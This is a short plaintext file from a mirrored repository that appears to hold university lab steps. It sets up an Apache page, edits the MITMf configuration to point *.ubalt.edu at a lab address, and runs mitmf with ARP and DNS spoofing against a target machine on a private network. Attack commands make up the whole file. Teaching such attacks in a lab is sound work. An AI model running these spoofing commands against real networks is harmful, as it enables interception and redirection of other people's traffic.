mirror of
https://github.com/frankwxu/Ubalt.git
synced 2026-04-10 12:33:42 +00:00
9 lines
203 B
Plaintext
9 lines
203 B
Plaintext
echo "my person web page" > /var/www/html/index.html
|
|
service apache2 start
|
|
|
|
leafpad /etc/mitmf/mitmf.conf
|
|
*.ubalt.edu=10.0.2.10
|
|
|
|
mitmf --arp --spoof --gateway 10.0.2.1 --target 10.0.2.15 -i eth0 --dns
|
|
|